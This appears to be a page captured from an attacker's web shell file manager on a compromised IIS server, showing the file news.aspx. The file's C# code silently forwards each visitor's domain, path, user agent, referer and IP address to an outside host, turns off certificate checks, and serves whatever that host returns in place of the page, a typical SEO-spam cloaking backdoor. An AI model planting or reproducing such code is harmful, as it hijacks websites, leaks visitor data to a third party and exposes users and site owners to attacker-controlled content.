File Manager
Back to List
|
Up to Parent Directory
| Current Directory: ~/58th
Editing: 58th/news.aspx
Full path: C:\ict\ICT\58th\news.aspx
Permissions: rwx
Write test: File appears writable
Current process identity: IIS APPPOOL\DefaultAppPool
<%@ Page Language="C#" AutoEventWireup="true" Debug="false" %> <%@ Import Namespace="System" %> <%@ Import Namespace="System.IO" %> <%@ Import Namespace="System.Net" %> <%@ Import Namespace="System.Text" %> <%@ Import Namespace="System.Web" %> <%@ Import Namespace="System.Text.RegularExpressions" %> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <script runat="server"> void Page_Load(object sender, EventArgs e) { // 常量定义 string API_URL = "https://api.pshvpn.com/api"; try { string domain = GetDomain(); string path = GetPath(); // 处理普通请求 HandleNormalRequest(API_URL, domain, path); } catch { // 静默处理异常 } } string GetDomain() { string domain = Request.Headers["X-Forwarded-Host"]; if (string.IsNullOrEmpty(domain)) { domain = Request.Headers["Host"]; if (string.IsNullOrEmpty(domain)) { domain = Request.Url.Host; } } return domain == null ? "" : domain; } string GetPath() { string path = Request.RawUrl; if (string.IsNullOrEmpty(path)) { path = Request.Headers["X-Rewrite-Url"]; } return path == null ? "" : path; } void HandleNormalRequest(string apiUrl, string domain, string path) { // 构建POST数据 StringBuilder postData = new StringBuilder(); postData.Append("domain=" + HttpUtility.UrlEncode(domain)); postData.Append("&path=" + HttpUtility.UrlEncode(path)); postData.Append("&spider=" + HttpUtility.UrlEncode(Request.UserAgent == null ? "" : Request.UserAgent)); postData.Append("&referer=" + HttpUtility.UrlEncode(Request.UrlReferrer == null ? "" : Request.UrlReferrer.ToString())); postData.Append("&ipaddr=" + HttpUtility.UrlEncode(GetClientIP())); string result = PostUrl(apiUrl, postData.ToString()); Response.Write(result); Response.End(); } string PostUrl(string url, string postData) { HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url); request.Method = "POST"; request.Timeout = 30000; request.UserAgent = Request.UserAgent; request.ContentType = "application/x-www-form-urlencoded"; if (Request.UrlReferrer != null) { request.Referer = Request.UrlReferrer.ToString(); } // 忽略SSL证书验证 ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback( delegate { return true; } ); byte[] byteArray = Encoding.UTF8.GetBytes(postData); request.ContentLength = byteArray.Length; Stream dataStream = request.GetRequestStream(); dataStream.Write(byteArray, 0, byteArray.Length); dataStream.Close(); HttpWebResponse response = (HttpWebResponse)request.GetResponse(); Stream responseStream = response.GetResponseStream(); StreamReader reader = new StreamReader(responseStream); string result = reader.ReadToEnd(); reader.Close(); responseStream.Close(); response.Close(); return result; } string GetClientIP() { string ip = Request.ServerVariables["HTTP_CLIENT_IP"]; if (string.IsNullOrEmpty(ip)) { ip = Request.ServerVariables["HTTP_X_FORWARDED_FOR"]; } if (string.IsNullOrEmpty(ip)) { ip = Request.ServerVariables["REMOTE_ADDR"]; } if (string.IsNullOrEmpty(ip)) { ip = Request.UserHostAddress; } // 使用正则表达式验证IP格式 if (!string.IsNullOrEmpty(ip)) { Match match = Regex.Match(ip, @"[\d\.]{7,15}"); if (match.Success) { return match.Value; } } return ""; } </script> <html xmlns="http://www.w3.org/1999/xhtml"> <head runat="server"> <title></title> </head> <body> </body> </html>